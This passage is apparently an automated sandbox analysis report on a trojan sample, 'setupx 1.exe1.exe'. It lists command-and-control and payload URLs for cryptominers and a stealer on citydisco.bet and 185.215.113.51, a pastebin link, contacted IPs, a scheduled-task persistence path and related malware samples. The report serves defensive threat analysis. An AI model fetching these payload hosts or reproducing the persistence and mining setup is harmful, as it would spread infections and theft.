https://citydisco.bet/gdJISre	setupx 1.exe1.exe, 00000002.00000003.1082401555.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113252451.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lBLr	powershell.exe, 0000000D.00000002.1239270589.0000000004E91000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.51/WinRing0x64.sysP	ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi	setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJISAAIA	setupx 1.exe1.exe, 00000002.00000003.1082401555.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet/D	setupx 1.exe1.exe, 00000002.00000003.1152775702.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182053990.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.51/WatchDog.exeEhttp://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.ex	setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.dr	false		high
http://185.215.113.51/WatchDog.exeP	ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.51/conhost.exe:	setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.51/WatchDogee	setupx 1.exe1.exe, 00000002.00000003.1308460293.000000000386A000.00000004.00000800.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2258316500.000000000386C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.51/J	setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet/	setupx 1.exe1.exe, 00000002.00000003.1152775702.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308962927.0000000000FC7000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113377940.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182650520.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139527382.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256410561.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139805381.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182053990.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113252451.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.51/D	setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.51/C	setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003064000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1239270589.0000000004E91000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.51/lolMiner.exe	ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet:443/gdJIS	setupx 1.exe1.exe, 00000002.00000003.1081790283.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://citydisco.bet:443/gdJIS71025-5-	setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.51/	setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.51/conhost.exe	setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308909879.0000000000FCD000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256465217.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2255217438.0000000000ECB000.00000004.00000010.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://pastebin.comd	ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003078000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44	setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.51	ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mi	powershell.exe, 0000000D.00000002.1238344010.0000000003057000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.51/xmrig.exeP	ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/v20w	setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/Vs16c	setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.51D	ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.exe	setupx 1.exe1.exe, 00000002.00000002.2256621404.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20	setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJIS6	setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta	setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pastebin.com	ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003078000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com	ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003071000.00000004.00000800.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003064000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.51/WinRing0x64.sysChttps://pastebin.com/raw/YpJeSRBC	setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256621404.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	citydisco.bet	European Union	13335	CLOUDFLARENETUS	false
172.67.19.24	pastebin.com	United States	13335	CLOUDFLARENETUS	false
185.215.113.51	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1637273
Start date and time:	2025-03-13 13:32:24 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	setupx 1.exe1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@33/17@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 18 Number of non-executed functions: 141
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.69.147.202, 20.190.159.68, 4.175.87.197, 23.60.203.209, 172.202.163.200
Excluded domains from analysis (whitelisted): onedsblobvmssprdcus02.centralus.cloudapp.azure.com, fs.microsoft.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:33:38	API Interceptor	7x Sleep call for process: setupx 1.exe1.exe modified
08:33:42	API Interceptor	1x Sleep call for process: WerFault.exe modified
08:33:57	API Interceptor	11x Sleep call for process: powershell.exe modified
08:34:02	API Interceptor	17x Sleep call for process: ZHKYZWVTC38PGAWGZF49K.exe modified
13:34:03	Task Scheduler	Run new task: dllhost path: C:\ProgramData\Dllhost\dllhost.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	http://sg-adh7.vv.885210.xyz/	Get hash	malicious	Unknown	Browse	sg-adh7.vv.885210.xyz/favicon.ico
	http://caixadirectasecdigital.com/	Get hash	malicious	HTMLPhisher	Browse	caixadirectasecdigital.com/favicon.ico
	PO NO 28950.exe	Get hash	malicious	FormBook	Browse	www.tether1.xyz/focp/
	RFQ- Italy.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.xploitation.net/sqjz/
	Enquiry Quote - 21834-01.exe	Get hash	malicious	FormBook	Browse	www.joeyvv.xyz/b80n/
	DcbI6OM1wO.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	ddrtot.shop/New/PWS/fre.php
	kVPzMgJglW.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/j4nd/
	tnZI8EzSx3.exe	Get hash	malicious	FormBook	Browse	www.braposaldesk.cyou/3it7/
	zzSk99EqY0.exe	Get hash	malicious	FormBook	Browse	www.braposaldesk.cyou/3it7/
	hh01FRs81x.exe	Get hash	malicious	FormBook	Browse	www.serenityos.dev/dntg/?R4lxS2-P=Xi77pNpzRwduTXf13DwoRl9ks24bE/OoZO8jI9GlbI12YargANeHXOwJPk3kluRPu8INtGeEgdhJoy+Tym0P0ZbjUAApu4gNis/FV3kbZJq8JK1mGA==&LL=4FHLH
172.67.19.24	rrats.exe	Get hash	malicious	AsyncRAT	Browse	pastebin.com/raw/KKpnJShN
	sys_upd.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_menu..ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm2.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_phshop..ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	VvPrGsGGWH.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	pastebin.com/raw/sA04Mwk2
	HQsitBLlOv.dll	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	xK44OOt7vD.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_hiddenz.ps1	Get hash	malicious	AsyncRAT, XWorm	Browse	pastebin.com/raw/sA04Mwk2

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pastebin.com	Steam.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.3.235
	Kiddion's Modest Menu v.1.0.0.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	172.67.19.24
	Venom.6.0.3.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
	svchost.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.3.235
	config.exe	Get hash	malicious	XWorm	Browse	104.20.3.235
	nbtypsfikkad.exe	Get hash	malicious	Xmrig	Browse	104.20.3.235
	biopderfawd.exe	Get hash	malicious	Xmrig	Browse	104.20.3.235
	#Ud835#Udde6#Ud835#Uddd8#Ud835#Udde7#Ud835#Udde8#Ud835#Udde3.exe	Get hash	malicious	LummaC Stealer	Browse	104.20.3.235
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.20.4.235
	q2e132qweertgd.exe.bin.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.4.235
citydisco.bet	Installer64x.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	setupx 2.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	ModMenu.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SoftWare(2).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SoftWare(1).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	Galaxy Swapper v2.0.3.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	13s1HMkHKv.exe	Get hash	malicious	Amadey, DarkVision Rat, Fallen Miner, LummaC Stealer	Browse	188.114.96.3
	SoftWare(1).exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Kiddion's Modest Menu v.1.0.0.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.96.3
	Launcher_v2.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Installer64x.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	setupx 2.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	ModMenu.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SoftWare(2).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SimpleLoader v2.1.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.144.37
	SoftWare(1).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	https://llttfr.boa.ink/?fr=gemma.inglis@heritageportfolio.co.uk	Get hash	malicious	Unknown	Browse	104.17.25.14
	2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	https://qrsu.io/ONKMx	Get hash	malicious	Unknown	Browse	104.17.24.14
	PO_L202503042.html	Get hash	malicious	Unknown	Browse	104.18.186.31
WHOLESALECONNECTIONSNL	Installer64x.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.51
	SoftWare(2).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.51
	Kiddion's Modest Menu v.1.0.0.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	185.215.113.51
	file.exe	Get hash	malicious	Unknown	Browse	185.215.113.39
	Inst#U0430ll.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	185.215.113.51
	a0RkmvhSaf.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
	Setup.exe	Get hash	malicious	Xmrig	Browse	185.215.113.51
	mQRr8Rkorf.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	random(1).exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.115
	random(4).exe	Get hash	malicious	Unknown	Browse	185.215.113.39
CLOUDFLARENETUS	Installer64x.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	setupx 2.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	ModMenu.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SoftWare(2).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SimpleLoader v2.1.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.144.37
	SoftWare(1).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	https://llttfr.boa.ink/?fr=gemma.inglis@heritageportfolio.co.uk	Get hash	malicious	Unknown	Browse	104.17.25.14
	2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	https://qrsu.io/ONKMx	Get hash	malicious	Unknown	Browse	104.17.24.14
	PO_L202503042.html	Get hash	malicious	Unknown	Browse	104.18.186.31

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.19.24
	Steam.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	172.67.19.24
	SOA Since OCT DEC 241738316681530012900.bat	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.19.24
	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Get hash	malicious	GhostRat, ValleyRAT	Browse	172.67.19.24
	SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.19.24
	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
	#U70b9#U51fb#U6b64#U5904-#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U53051.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
	uy2g7z.bat	Get hash	malicious	Unknown	Browse	172.67.19.24
	PO-2513203-PDF.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.19.24
	brave.ps1	Get hash	malicious	Unknown	Browse	172.67.19.24
a0e9f5d64349fb13191bc781f81f42e1	Installer64x.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	setupx 2.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	ModMenu.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SoftWare(2).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SimpleLoader v2.1.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SoftWare(1).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	script5.ps1	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	PO #S149102025.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	ppcore.dll.dll	Get hash	malicious	Unknown	Browse	188.114.97.3
	ppcore.dll.dll	Get hash	malicious	Unknown	Browse	188.114.97.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\Dllhost\WinRing0x64.sys	Kiddion's Modest Menu v.1.0.0.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse
